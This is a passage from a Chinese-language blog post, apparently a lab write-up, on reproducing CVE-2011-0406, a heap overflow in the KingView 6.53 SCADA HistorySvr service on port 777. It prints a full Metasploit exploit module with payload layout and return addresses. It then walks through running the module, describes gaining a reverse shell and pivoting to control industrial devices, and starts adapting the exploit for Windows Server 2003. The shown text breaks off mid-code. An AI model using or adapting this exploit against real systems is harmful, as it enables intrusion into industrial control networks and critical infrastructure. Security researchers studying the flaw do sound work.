<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>（工控向）组态王软件漏洞测试验证与利用 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="​        WellinTech KingView 6.53 版本中的 HistorySvr.exe 中存在基于堆的缓冲区溢出漏洞。需要掌握远程攻击的方式借助对 TCP 端口 777 的超长请求执行任意代码，实现在 windows 操作员站上的漏洞利用。">
<meta property="og:type" content="article">
<meta property="og:title" content="（工控向）组态王软件漏洞测试验证与利用">
<meta property="og:url" content="http://example.com/2021/01/26/%EF%BC%88%E5%B7%A5%E6%8E%A7%E5%90%91%EF%BC%89%E7%BB%84%E6%80%81%E7%8E%8B%E8%BD%AF%E4%BB%B6%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95%E9%AA%8C%E8%AF%81%E4%B8%8E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="​        WellinTech KingView 6.53 版本中的 HistorySvr.exe 中存在基于堆的缓冲区溢出漏洞。需要掌握远程攻击的方式借助对 TCP 端口 777 的超长请求执行任意代码，实现在 windows 操作员站上的漏洞利用。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z6iwd0b9j315z0qdaro.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z76ec19gj30cn02qt8o.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7csvgf1j31h70tb1kx.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7eecdghj30jm0awgor.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7hwlsxij312h0iljtt.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7jk1c1sj30p20icwp4.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7k7ok7cj30p20ich4a.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7lxgfzcj30m80htgoe.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7onss9gj31g30suju7.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z80ro7apj31g30sue82.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z82ue9dhj31g30suqv5.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z846kebnj31g30suwht.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z8551rqjj31g30su0w1.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z89ajgtjj31g30su4qq.jpg">
<meta property="article:published_time" content="2021-01-26T03:24:38.000Z">
<meta property="article:modified_time" content="2021-01-26T07:38:48.034Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z6iwd0b9j315z0qdaro.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-（工控向）组态王软件漏洞测试验证与利用" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/01/26/%EF%BC%88%E5%B7%A5%E6%8E%A7%E5%90%91%EF%BC%89%E7%BB%84%E6%80%81%E7%8E%8B%E8%BD%AF%E4%BB%B6%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95%E9%AA%8C%E8%AF%81%E4%B8%8E%E5%88%A9%E7%94%A8/" class="article-date">
  <time class="dt-published" datetime="2021-01-26T03:24:38.000Z" itemprop="datePublished">2021-01-26</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%B7%A5%E6%8E%A7/">工控</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      （工控向）组态王软件漏洞测试验证与利用
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>​        WellinTech KingView 6.53 版本中的 HistorySvr.exe 中存在基于堆的缓冲区溢出漏洞。需要掌握远程攻击的方式借助对 TCP 端口 777 的超长请求执行任意代码，实现在 windows 操作员站上的漏洞利用。</p>
<a id="more"></a>

<h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h2><h3 id="组态王-KingView"><a href="#组态王-KingView" class="headerlink" title="组态王 KingView"></a>组态王 KingView</h3><p>​        亚控科技是国内较早成立的自动化软件企业之一，专注于自主研发、市场营销和服务。 1995 年率先推出组态软件 KingView 系列产品，创立组态王品牌，经过近 20 年的快速发展， 目前公司的产品涵盖设备或工段级监控平台、厂级或集团级监控平台、生产实时智能平台， 产品及方案广泛应用于市政、油气、电力、矿山、物流、汽车、大型设备等行业。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z6iwd0b9j315z0qdaro.jpg" alt="截屏2019-10-15下午8.55.24"></p>
<p>​        设备或工段级监控平台即组态王 KingView 系列产品侧重于对各种设备运行状态、某个 工段或生产线运行情况的监视控制，厂级或集团级监控平台即 KingIOServer、KingSCADA、 KingHistria产品侧重于厂级或集团级生产运营情况的全面监控及管理;生产管理平台即 KingFusion 产品则侧重实现产线监控和生产管理的完美结合。</p>
<h2 id="CVE-2011-0406"><a href="#CVE-2011-0406" class="headerlink" title="CVE-2011-0406"></a>CVE-2011-0406</h2><p>​        CVE-2011-0406 所描述的是亚控组态软件 KingView 6.53 存在的一个缓冲区溢出漏洞, 通过反汇编逆向分析结合动态调试可以发现该漏洞的成因,并可构造攻击代码对其所在上位 机进行攻击,进而获得上位机的远程控制权限。</p>
<p>​        亚控组态软件 KingView 6.53 是运行在 windows 系列操作系统上的组态软件，是亚控 公司推出的一款针对中小型项目推出的用于监视与控制自动化设备和过程的 SCADA 产品, 支持连接 1000 多个厂家近 4000 种设备，支持包括主流 PLC、变频器、仪表、特殊模块、板 卡及电力、楼宇等协议。通过分析发现安装Ki􏰆gView6.53 软件后，系统会启动 HistorySvr.exe 进程并会以系统服务形式在上位机中运行，该服务会在 TCP 的 777 端口监听接收数据，在 接收到数据后 HistorySvr.exe 程序会有 3 次拷贝操作，前两次各 0x4000 字节，最后一次 0xC 字节，共计 0x800C(32780)字节，在写入缓冲区时，对数据校验不严格导致堆缓冲区溢出 而执行任意代码。通过构造带有 shellcode 的恶意数据包向目标主机的 777 端口进行发送即 可触发该漏洞</p>
<p>​        HistorySvr.exe 进程循环接收业务数据(传感器上报数据)，当接收到 异常格式的业务数据后进行数据处理时没有对数据长度进行严格校验，导致异常数据会覆盖缓冲区空间，当 CPU 按照指针地址执行指令时会跳转到攻击者设计好的 shellcode地址进行执行，导致执行攻击者构造的攻击代码。在实验过程中可以利用meatasploit攻击框架工具构造攻击代码，主要攻击载荷如下:</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sploit&lt; &lt; make_nops(<span class="number">1020</span>)</span><br><span class="line">sploit&lt; &lt; <span class="string">&quot;\xC4\x04\x2B\x01&quot;</span></span><br><span class="line">sploit&lt; &lt; payload.encoded</span><br><span class="line">sploit&lt; &lt; <span class="string">&quot;x44&quot;</span>* (<span class="number">31752</span>-payload.encoded.length) 	</span><br><span class="line">sploit&lt; &lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>​        通过代码可看出数据包前 1020 位使用指令用来占位，接下来 4 位是我们构造的反向连接 shellcode 在内存空间中的地址，后面是加密后的shellcode 代码，然后用(31752-shellcode长度)位的 A 字符来填充补位，最后是用来覆盖 eax 寄存器的跳转地址。</p>
<p>​        通过缓冲区溢出漏洞可覆盖 eax 寄存器的数据，导致程序执行到 call dword ptr[eax+c] 时指针跳转到 shellcode地址进行执行，在实际测试中可以使用metasploit构造不同类型的shellcode，可以构造反向连接类型 shellcode。使用metasploit进行攻击测试的时候需要设置 3 个参数，RHOST为远程上位机IP 地址，RPORT为 HistorySvr.exe 进程监听端口，payload为攻击载荷shellcode。</p>
<p>​        设置好攻击目标及端口，并加载好shellcode 后可以使用 run命令进行攻击测试，攻击成功后会获得反向连接的控制权限，并可使用metasploit自带的工具meterpreter在远程机器上执行系统命令进行远程控制。</p>
<p>​        获得系统权限后可以该上位机为跳板对系统内其他设备进行二次渗透，可窃取系统运行数据、向传感器节点发送控制指令、使用病毒感染系统内网其他服务器，进而危害整个工控系统及基础设施安全。</p>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a><strong>实验环境</strong></h2><p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z76ec19gj30cn02qt8o.jpg" alt="截屏2019-10-15下午9.17.54"></p>
<p>​    Windows Server 2003:KingView 6.53<br>​    Kali Linux:metasploit、Python等</p>
<p>​    网卡：Server2003 与Kali桥接为同一网卡</p>
<h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a><strong>实验步骤</strong></h2><h3 id="实验准备"><a href="#实验准备" class="headerlink" title="实验准备"></a>实验准备</h3><p>​        收集 CVE-2011-0406 的信息和 EXP</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##</span></span><br><span class="line"><span class="comment"># $Id$</span></span><br><span class="line"><span class="comment">##</span></span><br><span class="line"></span><br><span class="line"><span class="comment">##</span></span><br><span class="line"><span class="comment"># This file is part of the Metasploit Framework and may be subject to</span></span><br><span class="line"><span class="comment"># redistribution and commercial restrictions. Please see the Metasploit</span></span><br><span class="line"><span class="comment"># Framework web site for more information on licensing and terms of use.</span></span><br><span class="line"><span class="comment"># http://metasploit.com/framework/</span></span><br><span class="line"><span class="comment">##</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">require</span> <span class="string">&#x27;msf/core&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">	Rank = GoodRanking</span><br><span class="line"></span><br><span class="line">	<span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info=&#123;&#125;)</span></span></span><br><span class="line">		<span class="keyword">super</span>(update_info(info,</span><br><span class="line">			<span class="string">&#x27;Name&#x27;</span>        =&gt; <span class="string">&quot;Kingview 6.53 SCADA HMI HistorySvr Heap Overflow&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;Description&#x27;</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">				This module exploits a buffer overflow in Kingview 6.53.  By sending a specially</span></span><br><span class="line"><span class="string">				crafted request to port 777 (HistorySvr.exe), a remote attacker may be able to</span></span><br><span class="line"><span class="string">				gain arbitrary code execution without authentication.</span></span><br><span class="line"><span class="string">			&#125;</span>,</span><br><span class="line">			<span class="string">&#x27;License&#x27;</span>	  =&gt; MSF_LICENSE,</span><br><span class="line">			<span class="string">&#x27;Version&#x27;</span>	  =&gt; <span class="string">&quot;$Revision$&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;Author&#x27;</span>      =&gt;</span><br><span class="line">				[</span><br><span class="line">					<span class="string">&#x27;Dillon Beresford&#x27;</span>,  <span class="comment">#Found by Dillon</span></span><br><span class="line">					<span class="string">&#x27;rick2600&#x27;</span>,          <span class="comment">#XP SP3 execution</span></span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;References&#x27;</span> =&gt;</span><br><span class="line">				[</span><br><span class="line">					[<span class="string">&#x27;CVE&#x27;</span>, <span class="string">&#x27;2011-0406&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;OSVDB&#x27;</span>, <span class="string">&#x27;70366&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;Bugtraq&#x27;</span>, <span class="string">&#x27;45727&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://www.exploit-db.com/exploits/15957&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://www.kb.cert.org/vuls/id/180119&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html&#x27;</span>],</span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;Payload&#x27;</span>	 =&gt;</span><br><span class="line">				&#123;</span><br><span class="line">					<span class="string">&#x27;BadChars&#x27;</span> =&gt; <span class="string">&quot;\x00\x0d\x0a\xff&quot;</span></span><br><span class="line">				&#125;,</span><br><span class="line">			<span class="string">&#x27;Platform&#x27;</span> =&gt; <span class="string">&#x27;win&#x27;</span>,	</span><br><span class="line">			<span class="string">&#x27;Targets&#x27;</span>	 =&gt;</span><br><span class="line">				[</span><br><span class="line">					[ <span class="string">&#x27;Windows XP SP1&#x27;</span>, &#123;<span class="string">&#x27;Ret&#x27;</span> =&gt; <span class="number">0x77ED73B4</span>&#125; ], <span class="comment">#UnhandledExceptionFilter() in kernel32.dll</span></span><br><span class="line">					[ <span class="string">&#x27;Windows XP SP3 EN&#x27;</span>, &#123;<span class="string">&#x27;Ret&#x27;</span> =&gt; <span class="number">0x00A1FB84</span>&#125; ],</span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;DisclosureDate&#x27;</span> =&gt; <span class="string">&quot;9/28/2010&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;DefaultTarget&#x27;</span> =&gt; <span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">			register_options( [ Opt::RPORT(<span class="number">777</span>) ], <span class="keyword">self</span>.<span class="keyword">class</span> )</span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">		sploit = <span class="string">&#x27;&#x27;</span></span><br><span class="line">		<span class="keyword">if</span> target.name =~ <span class="regexp">/XP SP1/</span></span><br><span class="line"></span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">32812</span>)</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\xEB\x10&quot;</span></span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x41&quot;</span>*<span class="number">6</span></span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\xAD\xBB\xC3\x77&quot;</span></span><br><span class="line">			sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">8</span>)</span><br><span class="line">			sploit &lt;&lt; payload.encoded</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">1000</span>-payload.encoded.length)</span><br><span class="line">			<span class="comment">#this makes the app more crashy, need to investigatev</span></span><br><span class="line">			<span class="comment">#sploit &lt;&lt; make_nops(1000-payload.encoded.length) </span></span><br><span class="line"></span><br><span class="line">		<span class="keyword">elsif</span> target.name =~ <span class="regexp">/XP SP3/</span></span><br><span class="line"></span><br><span class="line">			sploit &lt;&lt; make_nops(<span class="number">1024</span>)</span><br><span class="line">			sploit &lt;&lt; payload.encoded</span><br><span class="line">			sploit &lt;&lt; <span class="string">&quot;\x44&quot;</span>*(<span class="number">31752</span>-payload.encoded.length)</span><br><span class="line">			<span class="comment">#rand_text_alpha_xxx() unfortunately makes it a bit unstable,</span></span><br><span class="line">			<span class="comment">#not ready to implement</span></span><br><span class="line">			<span class="comment">#sploit &lt;&lt; rand_text_alpha_upper(32776-sploit.length)</span></span><br><span class="line">			sploit &lt;&lt; [target.ret].pack(<span class="string">&#x27;V&#x27;</span>)</span><br><span class="line"></span><br><span class="line">		<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">		connect</span><br><span class="line"></span><br><span class="line">		print_status(<span class="string">&quot;Trying target <span class="subst">#&#123;target.name&#125;</span>&quot;</span>)</span><br><span class="line">		sock.write(sploit)</span><br><span class="line"></span><br><span class="line">		select(<span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="number">5</span>)</span><br><span class="line">		handler</span><br><span class="line">		disconnect</span><br><span class="line"></span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<p>​        将 rb 脚本存放至 metasploit的相应安装目录中进行调用。 例如:/exploits/windows/scada</p>
<p>​        开启 KingView6.53 打开软件预制 Kingdemo 工程。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7csvgf1j31h70tb1kx.jpg" alt="截屏2019-10-15下午9.24.03"></p>
<p>​        确认目标及其 777 端口已经开放，并且防火墙是关闭状态。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7eecdghj30jm0awgor.jpg" alt="截屏2019-10-15下午3.47.16"></p>
<h3 id="攻击尝试"><a href="#攻击尝试" class="headerlink" title="攻击尝试"></a>攻击尝试</h3><p>​        开启 Kali 安全测试主机作为攻击测试主机，确认msf框架 exploit 攻击代码录入并保存在/usr/share/metasploit-framework/modules/expolits/windows/scada 目录下。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7hwlsxij312h0iljtt.jpg" alt="截屏2019-10-15下午9.29.02"></p>
<p>​        启动metasploit，加载kingview模块</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7jk1c1sj30p20icwp4.jpg" alt="截屏2019-10-15下午4.53.55"></p>
<p>​        查看攻击靶机ip地址，置入 RHOST 参数中。进行攻击尝试。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7k7ok7cj30p20ich4a.jpg" alt="截屏2019-10-15下午5.21.34"></p>
<p>​        由于攻击代码中并没有包含 windows Server 2003 版本，因此攻击未成功。</p>
<h3 id="分析漏洞"><a href="#分析漏洞" class="headerlink" title="分析漏洞"></a>分析漏洞</h3><p>​        我们可以看到目标靶机中的kingview服务已经停止，并且异常调试工具已经启动。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7lxgfzcj30m80htgoe.jpg" alt="截屏2019-10-15下午5.39.21"></p>
<p>​        这表明 HistorySvr.exe 程序中的漏洞已经被触发且产生影响，只是 shellcode 并未在目标靶机中运行，程序执行未跳转到指定 shellcode 位置。</p>
<p>​        通过查看 OllyDbg 中 view—&gt;log，可以看到程序终止在地址为 0x77F47530，异常原因 为 Access violation when reading [00B5084D]。</p>
<p><img src="https://tva1.sinaimg.cn/large/006y8mN6ly1g7z7onss9gj31g30suju7.jpg" alt="截屏2019-10-15下午6.58.20"></p>
<p>​        观察程序发生异常时执行代码为mov cl, byte ptr  [eax + 5]，即程序将执行该指针位置处的指令，然而该地址值为 0x00B5084D，并未获取到可执行指令。</p>
<p>​        利用代码针对目标为“windows XP SP3 EN”系统的返回地址 Ret 为异常时 EAX 寄存器 的值 0x00B50848。</p>
<h3 id="修改利用代码"><a href="#修改利用代码" class="headerlink" title="修改利用代码"></a>修改利用代码</h3><p>​        重新打开漏洞利用代码进行编辑，targets 中加入“windows 2003 SP0 EN”，target.name 加入“2003 SP0”，Ret 值暂时随意填写，exploit 函数构造溢出包时，加入定位字符“ABCA” 便于我们定位 payload 地址位置，具体代码如下所示。</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">&#x27;msf/core&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">	Rank = GoodRanking</span><br><span class="line"></span><br><span class="line">	<span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info=&#123;&#125;)</span></span></span><br><span class="line">		<span class="keyword">super</span>(update_info(info,</span><br><span class="line">			<span class="string">&#x27;Name&#x27;</span>        =&gt; <span class="string">&quot;Kingview 6.53 SCADA HMI HistorySvr Heap Overflow&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;Description&#x27;</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">				This module exploits a buffer overflow in Kingview 6.53.  By sending a specially</span></span><br><span class="line"><span class="string">				crafted request to port 777 (HistorySvr.exe), a remote attacker may be able to</span></span><br><span class="line"><span class="string">				gain arbitrary code execution without authentication.</span></span><br><span class="line"><span class="string">			&#125;</span>,</span><br><span class="line">			<span class="string">&#x27;License&#x27;</span>	  =&gt; MSF_LICENSE,</span><br><span class="line">			<span class="string">&#x27;Version&#x27;</span>	  =&gt; <span class="string">&quot;$Revision$&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;Author&#x27;</span>      =&gt;</span><br><span class="line">				[</span><br><span class="line">					<span class="string">&#x27;Dillon Beresford&#x27;</span>,  <span class="comment">#Found by Dillon</span></span><br><span class="line">					<span class="string">&#x27;rick2600&#x27;</span>,          <span class="comment">#XP SP3 execution</span></span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;References&#x27;</span> =&gt;</span><br><span class="line">				[</span><br><span class="line">					[<span class="string">&#x27;CVE&#x27;</span>, <span class="string">&#x27;2011-0406&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;OSVDB&#x27;</span>, <span class="string">&#x27;70366&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;Bugtraq&#x27;</span>, <span class="string">&#x27;45727&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://www.exploit-db.com/exploits/15957&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://www.kb.cert.org/vuls/id/180119&#x27;</span>],</span><br><span class="line">					[<span class="string">&#x27;URL&#x27;</span>, <span class="string">&#x27;http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html&#x27;</span>],</span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;Payload&#x27;</span>	 =&gt;</span><br><span class="line">				&#123;</span><br><span class="line">					<span class="string">&#x27;BadChars&#x27;</span> =&gt; <span class="string">&quot;\x00\x0d\x0a\xff&quot;</span></span><br><span class="line">				&#125;,</span><br><span class="line">			<span class="string">&#x27;Platform&#x27;</span> =&gt; <span class="string">&#x27;win&#x27;</span>,	</span><br><span class="line">			<span class="string">&#x27;Targets&#x27;</span>	 =&gt;</span><br><span class="line">				[</span><br><span class="line">					[ <span class="string">&#x27;Windows XP SP1&#x27;</span>, &#123;<span class="string">&#x27;Ret&#x27;</span> =&gt; <span class="number">0x77ED73B4</span>&#125; ], <span class="comment">#UnhandledExceptionFilter() in kernel32.dll</span></span><br><span class="line">					[ <span class="string">&#x27;Windows XP SP3 EN&#x27;</span>, &#123;<span class="string">&#x27;Ret&#x27;</span> =&gt; <span class="number">0x00A1FB84</span>&#125; ],</span><br><span class="line">					[ <span class="string">&#x27;Windows 2003 SP0 EN&#x27;</span>, &#123;<span class="string">&#x27;Ret&#x27;</span> =&gt; <span class="number">0x00B50848</span>&#125; ],<span class="comment">#newtarget</span></span><br><span class="line">				],</span><br><span class="line">			<span class="string">&#x27;DisclosureDate&#x27;</span> =&gt; <span class="string">&quot;9/28/2010&quot;</span>,</span><br><span class="line">			<span class="string">&#x27;DefaultTarget&#x27;</span> =&gt; <span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">			register_options( [ Opt::RPORT(<span class="number">777</span>) ], <span class="keyword">self</span>.<span class="keyword">class</span> )</span><br><span class="line">	<span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">	<span class="function"><span 